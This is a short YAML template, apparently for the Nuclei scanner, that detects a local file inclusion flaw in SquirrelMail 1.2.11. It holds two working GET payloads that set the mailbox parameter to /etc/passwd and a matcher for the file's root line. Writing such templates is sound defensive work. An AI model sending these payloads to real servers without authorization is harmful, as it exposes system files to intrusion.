id: squirrelmail-lfi

info:
  name: SquirrelMail 1.2.11 Local File Inclusion
  author: dhiyaneshDk
  severity: high
  reference: https://www.exploit-db.com/exploits/22793
  tags: lfi,squirrelmail

requests:
  - method: GET
    path:
      - "{{BaseURL}}/src/read_body.php?mailbox=/etc/passwd&passed_id=1&"
      - "{{BaseURL}}/src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd"

    stop-at-first-match: true
    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
